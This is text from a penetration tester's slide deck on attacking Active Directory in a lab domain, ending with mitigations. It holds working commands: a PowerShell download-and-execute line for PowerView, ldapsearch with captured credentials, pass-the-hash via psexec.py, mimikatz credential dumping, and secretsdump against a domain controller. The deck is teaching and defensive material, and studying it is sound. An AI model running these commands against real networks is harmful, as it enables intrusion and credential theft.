This document has been downloaded from www.ministryofsecurity.

co
Follow ministryofsecurity for more such infosec content.

Offensive Active Directory 101

Disclaimer
 Michael Ritter
whoami

About me: Daily work:

➢ Previously: ➢ Coordination and management of

➢ Professional at Deloitte Penetrationtests

➢ 5 years pentesting ➢ Performance of penetration tests

experience ➢ Infrastructure
➢ Web
Michael Ritter
➢ OSCP Certified ➢ Rich-Client
Service-Owner Pentesting
tacticx GmbH ➢ Currently researching ➢ Security assessments of Active
@BigM1ke_oNe Purple Teaming topics Directory environments
LinkedIn
XING

3
Agenda
pwny.corp - Attack

Basics
• What is Active Directory?
• Attack Landscape
• Active Directory Kill Chain

Phase 1 – Unauthorized User

• AD Enumeration without credentials
• Gaining initial Access

Phase 2 - Unprivileged User

• Taking advantage of LDAP
• Lateral movement techniques
• Basics NTLM Relay

Phase 3 - Privileged User

• Looting the thing

Mitigations

4
Basics
What is Active Directory and who uses it?
Basics
What is Active Directory?

➢ Microsofts answer to directory services

➢ Active directory is a hierarchical structure to store objects to:

» Access and manage resources of an enterprise
» Resources like: Users, Groups, Computers, Policies etc...

➢ 95% percent of Fortune 1000 companies use Active Directory

➢ Active Directory relies on different technologies in order to provide all features:

» LDAP
» DNS

➢ More information about the basics:

» https://blogs.technet.microsoft.com/ashwinexchange/2012/12/18/understanding-active-
directory-for-beginners-part-1/
6
Basics
Objects

» AD contains lot of juicy information about resources of an organization

» Following an overview about existing objects in AD:

7
Basics
Global Catalog

➢ The global catalog provides a central repository of domain information

➢ The global catalog provides a resource for searching an Active Directory forest
➢ LDAP queries use the global catalog to search for information
➢ Domain-Users have read access to the global catalogue

https://technet.microsoft.com/pt-pt/library/how-global-catalog-servers-work(v=ws.10).aspx 8
Attack Landscape
Active Directory – Structure

➢ Go Hunting?

@ciyinet 9
Basics
Active Directory – Privileged Accounts

➢ AD environments can be way more complex than that... Think about all the
services it provides

@ciyinet 10
Basics
Broad landscape of attacks

➢ Great attack landscape

@ciyinet

@ciyinet 11
Active directory kill chain
Broad landscape of attacks

➢ Focus of this talk

https://docs.microsoft.com/de-de/advanced-threat-analytics/ata-threats 12
Active directory kill chain
Broad landscape of attacks

➢ Focus of this talk

https://docs.microsoft.com/de-de/advanced-threat-analytics/ata-threats 13
Phase 1
Unauthorized User aka „Getting creds“
Phase 1
Starting Point

DC

Notebooks
Terminal Server

Workstations
Attacker Exchange
15
Phase 1 - Unauthorized User
Enumerate – Common Network traffic

➢ Check out what network protocols are running and analyse for potential
weaknesses

16
Phase 1 - Unauthorized User
Enumerate DHCP

➢ DHCP info

17
Phase 1 - Unauthorized User
Enumerate DNS

➢ DNS recon

18
Phase 1 - Unauthorized User
Enumerate – Metadata from LDAP

➢ Get some information from the LDAP service

➢ This information is necessary for other devices that want to join the domain

19
Phase 1 - Unauthorized User
Enumerate – Metadata from LDAP

➢ Forest functionality level is set based on the highest OS functionality level a

domain can support

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/understanding-active-directory-domain-services--ad-ds--functional-levels 20
 Phase 1 - Unauthorized User
Results – AD Recon

➢ Results:
» Domain name pwny.lab
» Domain Controller: pwnylabdc01.pwny.lab (10.0.3.200)
» Subnetz: 10.0.3.0/24
» Router: 10.0.3.1
» DC functionality level: Windows Server 2012
» Network clients:
» workstation01.pwny.lab
» workstation04.pwny.lab

21
Phase 1 - Unauthorized User
Gaining Access – Lots of opportunities to get initial access

22
Phase 1 - Unauthorized User
Gaining Access – Lots of opportunities to get initial access

➢ There are many different ways to steal user credentials like:

» Rouge devices
» Password spraying
» Default passwords (Tomcat, Jenkins & Co)
» Missing patches
» Cleartext passwords on file share
» Vulnerable web application
» Kerberoasting
» Social Engineering
» Phishing
» MITM
» Vulnerable software versions
» Have a look at the MITRE Attack Matrix
» https://attack.mitre.org/wiki/Initial_Access
23
Phase 1 - Unauthorized User
Gaining Access – DNS Fallbackprotocols

LLMNR, NBNS & Co.

➢ DNS-Fallbackprotocols
▪ Link Local Multicast Name Resolution (LLMNR)
▪ NETBIOS Name Service (NBNS)
▪ mDNS
➢ LLMNR & NBNS allow name resolution of
failed DNS requests
• Leveraging other computers in a
network

24
Network Layer Protection Analysis & Attack
Ablauf einer Namensauflösung

➢ Name Resolution Process:

Fallback Protocols:
Lokale „hosts“ Datei DNS Server
LLMNR/NBNS/mDNS

➢ Usage of LLMNR & NBNS in the PWNY.corp network

25
Network Layer Protection Analysis & Attack
LLMNR/NBNS Poisoning Attack

1. Connect to //filsrv 2. I don‘t know that one

3. Anyone know // filsrv?

Victim DNS Server

Network-Clients

Attacker
26
Demo
Stealing credentials abusing LLMNR/NBTNS
 Phase 1 - Unauthorized User
Gaining Access

➢ Analysing and cracking the ➢ Cracking the hashes

hashes

28
 Phase 1 - Unauthorized User
Results

➢ Results:
» Valid user account with password
» PWNY\jar.jar-binks:Welcome2015
» Users password hashes for:
» PWNY\darth.vader
» PWNY\obi-wan.kenobi
» PWNY\chewbacca

29
Phase 2 – Unprivileged Users
Taking advantage of LDAP
Phase 2 – Unprivileged user
Escalating privileges aka. lateral movement

➢ During phase 1, it was possible to compromise an unprivileged user account

» Not a local admin on any machine
» Not a member of any sensitive group

➢ What can you do with this?

» Login to webmail/user-mailbox
» Ruler
» Enumerate available SMB-shares
» SMBMap
» CrackMapExec
» Use available information in the Global Catalog to your advantage

31
Phase 2 – Unprivileged user
Taking advantage of LDAP

➢ Use available information in the Global Catalog to your advantage

➢ LDAP is the underlying directory access protocol in AD
➢ There are no special privileges needed to bind to LDAP - any valid account can
read the entire directory! (by default)
➢ Create very flexible queries using LDAP...
➢ Examples:
» Get a list of all domain users that contain *adm* in their account name
» Get a list of all domain groups that contain *adm*
» Get a list of all domain joined systems where operating system like *XP* or *2000*
» Show all groups a user is memberOf
» Recursively lookup all members of a group
» Show all user that have a description like *pass* or *pw*

32
Phase 2 – Unprivileged user
Lateral movement - Taking advantage of LDAP

Get a list of all domain users

ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "[email protected]" -w Welcome2015 -b
dc=pwny,dc=lab "(objectClass=user)" sAMAccountName userPrincipalName memberOf

Get a list of all domain groups

ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "[email protected]" -w Welcome2015 -b
dc=pwny,dc=lab "(objectClass=group)" sAMAccountName member memberOf

Get a list of all domain joined systems

ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "[email protected]" -w Welcome2015 -b
dc=pwny,dc=lab "(objectClass=computer)" name dNSHostname operatingSystem operatingSystemVersion
lastLogonTimestamp servicePrincipalName

Recursively lookup all members of a group

ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "[email protected]" -w Welcome2015 -b
dc=pwny,dc=lab "(&(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=CN=Domänen-
Admins,CN=Users,DC=PWNY,DC=LAB))" | grep sAMAccountName | cut -d" " -f2

Show all groups a user is memberOf

ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "[email protected]" -w Welcome2015 -b
dc=pwny,dc=lab "(sAMAccountName=darth.vader)" sAMAccountName userPrincipalName memberOf | grep
memberOf | cut -d "=" -f2 | cut -d"," -f1

https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf 33
Phase 2 – Unprivileged user
Lateral movement - Taking advantage of LDAP

➢ Another nice tool for manual analysis is

Active Directory Explorer from
Sysinternals
» You can use AD Explorer to easily
navigate through the global catalog
» Nice GUI to explore the environment
» Define favorite locations
» View object properties and attributes
without having to open dialog boxes
» Edit permissions
» View an object's schema, and execute
sophisticated searches, that you can
save and re-execute.

34
Phase 2 – Unprivileged user
Lateral movement - Taking advantage of LDAP

35
Phase 2 – Unprivileged user
Lateral movement - Taking advantage of LDAP

36
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ PowerView is a PowerShell tool to gain network situational awareness on

Windows domains
➢ No administrative credentials required
➢ My personal favorite
➢ Very useful for both “Blue” and “Red” Teams
➢ It contains a load of useful functions to identify possible issues in AD
environments
» net * Functions
» GPO functions
» User-Hunting Functions
» Domain Trust Functions
» MetaFunctions
➢ More details can be found at:
» https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
37
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Run PowerView from a non-domain computer

Download
iex(iwr("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1"))

# Use an alterate creadential for any PowerView function

$SecPassword = ConvertTo-SecureString 'Welcome2015' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('PWNY\jar-jar.binks', $SecPassword)

# Check if everything works

Get-NetDomain -Credential $Cred #test

38
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Enumerate all users, can be used for:

» Phishing and other social engineering attacks
» Password spraying
» ... be creative
# Get all the users
Get-NetUser -Credential $Cred | Format-Table name, samaccountname, userprincipalname, description

39
Phase 2 – Unprivileged user
Taking advantage of LDAP

➢ All this information can be re-used for further attacks...

➢ For example:
» Usernames
» Password spraying
» Phone numbers
» Social engineering
» Mail addresses
» Phishing attacks

40
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Enumerate what groups a specific user is member of

# List all groups of a specific user
Get-DomainGroup -MemberIdentity darth.vader -Credential $Cred | Format-Table cn

41
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Enumerate existing groups

# Get all existing groups
get-netgroup -Credential $Cred | Format-Table cn, distinguishedname, description
get-netgroup *adm* -Credential $Cred | Format-Table cn, distinguishedname, description

42
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Enumerate what groups a specific user is member of

# List all members of a specific group
Get-NetGroupMember -Identity "Domänen-Admins" -Recurse -Credential $Cred | Format-Table groupname,
memberdomain, membername

43
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ Go for a hunt and check out users that have active sessions work computers
# Go hunting for active user sessions
Invoke-UserHunter -showall -Credential $cred -ComputerName workstation04 | Format-Table -Property
userdomain, username,computername, ipaddress

➢ Remember that one??

44
Phase 2 – Unprivileged user
Lateral movement - PowerView

➢ List members of local groups of any system that has joined the domain
# List all members of a specific local group
Get-NetLocalGroupMember -ComputerName workstation04 -GroupName Administratoren –Credential $Cred | Format-
Table membername,isgroup,isdomain

➢ Remember that one??

45
 Phase 2 – Unprivileged user
Lateral movement – PowerView – Key takeaways

➢ Key takeaway of the enumeration

» obi-wan.kenobi is member of the adm_workstations group
» All members of the adm_workstations group have administrative rights on the
workstation04.pwny.lab system
» luke.skywalker who is member of “Domain Administrators” and has an active session
on workstation04.pwny.lab

User: luke.skywalker
Group: adm_workstations

Server: pwnylabdc01

Computer: workstation04
User: Domain Administrators
User: obi-wan.kenobi
46
Phase 2 – Unprivileged user
Lateral movement - Bloodhound

➢ BloodHound enumerates the whole AD

with normal user privileges and exports it
into a graph.
➢ BloodHound requires the following sets of
information from an Active Directory:
» Who is logged on where?
» Who has admin rights where?
» What users and groups belong to what
groups?
➢ All this information can be extracted with
normal user privileges.
➢ This tool becomes very useful in more
complex environments
https://github.com/BloodHoundAD/BloodHound/wiki/Getting-started 47
Phase 2 – Unprivileged user
Lateral movement - Bloodhound

Perform the following steps to use

Bloodhound:
1. Use “Bloodhoud PowerShell ingestor” to
collect the data
a. Possible without administrative
privileges (in most cases)
2. Setup neo4j and bloodhound
a. Instructions:
https://github.com/BloodHoundAD/Bloo
dhound/wiki
3. Run bloodhound and import the data

https://github.com/BloodHoundAD/BloodHound/wiki/Getting-started 48
Phase 2 – Unprivileged user
Lateral movement - Bloodhound

49
Phase 2 – Unprivileged user
Lateral movement - Bloodhound

50
Phase 2 – Lateral Movement
NTLM-Relay to move lateral within a network
NTLM Relay
Using ntlmrelayx.py

➢ What are the requirements for it to ➢ Conclusion

work? » Force the victim to authenticate the
» SMB Signing has to be deactivated on attackers (maybe your) machine
our target
» By default disabled on all
workstations and servers except of
DC´s
» Authentication needs to be done with
a user that has administrative
privileges on the target in order to get
RCE

➢ Attacks to enforce authentication:

» LLMNR/NBNS Poisoning
» UNC Path Injection
» Websites – XSS, HTML injection,
Directory Traversal, SQL injection etc.
» Office Documents etc.
» MITM
» Open redirect https://blog.netspi.com/10-places-to-stick-your-unc-path/ 52
NTLM Relay
Forcing authentication using LLMNR/NBNS Poisoning Attack

1. Connect to //filsrv 2. I don‘t know that one

3. Anyone know // filsrv?

Victim DNS Server

Network-Clients

Attacker
53
 NTLM Relay
NETNTLMv1/v2 Authentication Process

User: obi-wan.kenobi

1. This is obi-wan.kenobi, I‘d like to Login

working on

4. Here is the challenge and

response of obi-wan.kenobi is
2. If you are really obi-wan.kenobi, that valid?
then encrypt this challenge with obi-
wan.kenobi‘s PW Hash

5. I have compared obi-

wan.kenobis challege & response
and it is valid/invalid!
3. Here is the encrypted challenge

fileserver pwnylabdc01
workstation01
6. Access Granted/Denied

54
 NTLM Relay
Authentication Process – NETNTLMv1/v2 - Malicious

User: obi-wan.kenobi

1. This is obi-
wan.kenobi, I‘d like to
Login
working on

2. This is obi-wan.kenobi,
I‘d like to Login

3. Encrypt this challenge

with obi-wan.kenobi‘s 7. Here is the challenge and
4. Encrypt this challenge
PW Hash response of obi-wan.kenobi is
with obi-wan.kenobi‘s
that valid?
PW Hash

5. Here is the encrypted

workstation01
challenge
Attacker workstation04
8. I have compared obi- pwnylabdc01
6. Here is the encrypted wan.kenobis challege &
challenge response and it is valid!

9. Access Granted!

10. Access DENIED!

Result:
Remote Code
Execution
55
NTLM Relay
Authentication Process – NETNTLMv1/v2 - Malicious

➢ Impacket
» Awesome, collection of python scripts for working with network protocols
» https://github.com/CoreSecurity/impacket

➢ What protocols are featured?

» Ethernet, Linux "Cooked" capture.
» IP, TCP, UDP, ICMP, IGMP, ARP. (IPv4 and IPv6)
» NMB and SMB1/2/3 (high-level implementations).
» DCE/RPC versions 4 and 5, over different transports: UDP (version 4 exclusively), TCP,
SMB/TCP, SMB/NetBIOS and HTTP.
» Portions of the following DCE/RPC interfaces: Conv, DCOM (WMI, OAUTH), EPM,
SAMR, SCMR, RRP, SRVSC, LSAD, LSAT, WKST, NRPC

56
Demo
NTLM Relay
NTLM Relay
Results of the attack

➢ We dropped the hashes of the local

SAM database on workstation04
➢ Can be used to Pass-the-Hash
➢ By default, Windows Vista and higher
LLMNR/NBNS Poisoning
no longer store LM hashes on disk
➢ Benchmark on NTLM Hash with
Sagitta Brutalis 1080 (8x GF GTX 1080)
» 330 GH/s on NTLM (Hashcat)
NTLM Relay perform using ntlmrelayx.py – By default it will perform a SAMdump

https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4
https://gist.github.com/epixoip/a83d38f412b4737e99bbef804a270c40 58
NTLM Relay
Using ntlmrelayx.py

➢ NTLM Relay
» Relaying hashes is possible
» ntlmrelayx.py also offers option to
run arbitrary commands on the
system
» if the user is not admin you won´t Relaying to IMAP on Mailserver and dumping all mails that contain the search term password

get RCE, however you can relay to

other services like:
» LDAP
» IMAP
» MSSQL
» SMB

Relaying to LDAP server and creating a new user

59
Pass-the-Hash
Using psexec.py to Pass-the-Hash
Pass-the-hash
Using psexec.py to Pass-the-Hash and drop a shell

➢ Run psexec and Pass-the-Hash

» helpdesk:500:aad3b435b51404eeaad3b435b51404ee:94c2605ea71fca715caacfaa92088150:::

# Pass-the-Hash with psexec

python psexec.py helpdesk@workstation03 –hashes aad3b435b51404eeaad3b435b51404ee:94c2605ea71fca715caacfaa92088150

61
 Pass-the-Hash
Results of phase 2

➢Key takeaway after Pass-the-Hash to workstation04

» We have local administrative rights on workstation04 and can execute
code
» The “Domain Admin” luke.skywalker is working on this computer

User: luke.skywalker
Group: adm_workstations

Server: pwnylabdc01

Computer: workstation04
User: Domain Administrators
User: obi-wan.kenobi
62
Phase 3 – Privileged Access
Keep moving laterally abusing local admin privilges
Phase 3 – Privileged user (local)
Lateral movement – Hunting down the Domain Administrators

➢Administrative access to a computer means we can read process

memory

» Dumping memory contents of lsass.exe & extracting credentials

» Sysinternals ProcDump creates a minidump of the target process
» Use Mimikatz to extract the credentials from it
» Will not trigger AV

» Use Mimikatz in Metasploit to dump the credentials

» Might trigger AV

http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Demo
Dump creds with mimikatz
Phase 3 – Privileged user (local)
Lateral movement – Hunting down the Domain Administrators

➢ Run psexec and Pass-the-Hash

# Dumping creds in with meterpreter in metasploit using mimikatz (make sure you use an privileged account)
getsystem
load mimikatz
mimikatz command –f privilege::debug
mimikatz command –f sekurlsa::logonPasswords

http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
 Phase 3 – Privileged user (local)
Lateral movement – PowerView – Key takeaways

➢Key takeaway of after dumping the creds

» We have valid credentials for the user luke.skywalker
» luke.skywalker is member of the “Domain Admin” group, so we
have administrative access to the domain controller
User: luke.skywalker
Group: adm_workstations

Server: pwnylabdc01

Computer: workstation04
User: Domain Administrators
User: obi-wan.kenobi
67
Phase 3 – Privileged User
Looting the thing
Phase 3 – Privileged user (domain)
Looting the thing – secretsdump.py

➢We have administrative access to the domain controller

➢What now? Do you want persistance?

» Dumping all user hashes
» Creation of golden tickets

69
Phase 3 – Privileged user (domain)
Looting the thing – secretsdump.py

➢On workstations:
» secretsdump.py can be used to dump SAM/LSA secrets remotely
» Performs various techniques to dump hashes from a remote machine
without executing any agent there

➢On DCs it will also:

» For NTDS.dit it will either:
a) Get the domain users list and get all hashes of all domain users
(including historical ones) as well as Kerberos keys
a) MS Directory Replication Service (MS-DRS) Remote Protocol
b) Extract NTDS.dit
a) vssadmin executed with the smbexec approach
70
Demo
Dumping all the hashes – secretsdump.py
Phase 3 – Privileged user (local)
Lateral movement – Hunting down the Domain Administrators

➢ Run secretydump.py with administrative creds on the domain controller

# Dumping hashes of all domain users (including password history hashes)
python secretsdump.py pwny/luke.skywalker@pwnylabdc01
Mitigations
Preventing – AD Attacks 101
Phase 3 – Mitigations
Don´t let it come so far

➢Compromise of just one Domain Admin account in the Active

Directory exposes the entire organization to risk
» The attacker has unrestricted access to all resources managed by the
domain, all users, servers, workstations and data
» The attacker could instantly establish persistence in the Active
Directory environment, which is difficult to notice and cannot be
efficiently remediated with guarantees.

“Once domain admin, always domain admin”

Phase 3 – Mitigations
Defense against Responder attacks

➢ Disable LLMNR and NBT-NS

» You need to disable both, because if LLMNR is disabled, it will automatically
attempt to use NBT-NS instead
» Disable LLMNR via Group Policy
» Disabling NetBios cannot be done via GPO

➢ Limiting communication between workstations on the same network

» Reduces attack surface

➢ Mitigation against WPAD

» Disable WPAD via Group Policy
» Add DNS record “wpad” in your DNS zone
» Only allow secure dynamic updates – Dynamic updates “Secure only”

➢ Never let anyone perform non-administrative tasks with privileged accounts

https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
http://woshub.com/how-to-disable-netbios-over-tcpip-and-llmnr-using-gpo/
Phase 3 – Mitigations
Defense against NTLM Relay attacks

➢Disable NTLM entirely, use Kerberos

» Not really easy to implement

➢Enable SMB signing, where possible

» Can be done via Group Policy
» Please consider compatibility of other network devices before enabling SMB
Signing
» SMB signing will prevent relaying to SMB by requiring all traffic to be signed

➢Enable LDAP signing

» LDAP signing prevents unsigned connections to LDAP

➢More on NTLM relay and mitigations

» https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/
Phase 3 – Mitigations
Defense against lateral movement

➢ Deploy (Microsoft Local Administrator Password Solution)

» Provides a solution to the issue of using a common local account with an identical password on every
computer in a domain
» https://technet.microsoft.com/en-us/library/security/3062591

➢ Do not allow the use of privileged accounts to perform non-administrative tasks

» Provide admins with separate accounts to perform administrative duties

➢ Educate your users to exhibit secure behavior

» Good luck with that one :D

➢ Deactivate the Built-in Admin

➢ Restrict domain and enterprise admin accounts from authenticating to less trusted computers

➢ Establish Strong Password policies (complexity, history, expiration)

➢ Do not configure services or schedule tasks to use privileged domain accounts on lower trust computers
Phase 3 – Mitigations
Admin checklist

➢Use PowerView, Bloodhound or similar tool to understand you

environment
» Who has admin rights? Domain-wide? Local?
» Do they really need those privileges?
» Do they still work here?
» Who can log into DC`s
» Is there a policy to avoid logins into untrusted systems with domain
privileged accounts?
» Limit service accounts privileges
» Did all admins get a proper introduction into AD Security?
» Any SMB Shares accessible anonymously?
Phase 3 – Mitigations
Detection of advanced attacks - Microsoft Advanced Threat Analytics

➢Port mirroring from Domain

Controllers and DNS servers
to the ATA Gateway and/or
➢Deploying an ATA Lightweight
Gateway (LGW) directly on
Domain Controllers
➢More information to
Microsoft ATA
» https://docs.microsoft.com
/en-us/advanced-threat-
analytics/what-is-ata
Phase 3 – Mitigations
Admin checklist
Phase 3 – Mitigations
Defense against lateral movement

➢Read this:
» Mitigating Pass-the-Hash and
other Credential Theft, version 2
Credits
Shoutouts to the titans in this area
Phase 3 – Mitigations
Thank you for this journey

➢Huge shoutouts to:

» @ciyinet – Providing great slides
» @gentilkiwi – Mimikatz
» @agsolino – Creator of Impacket
» @TimMedin – Great talks
» @PyroTek3 – AD Security
» @nikhil_mitt – Powershell Training
» @byt3bl33d3r – CrackMapExec

and many more...

Questions?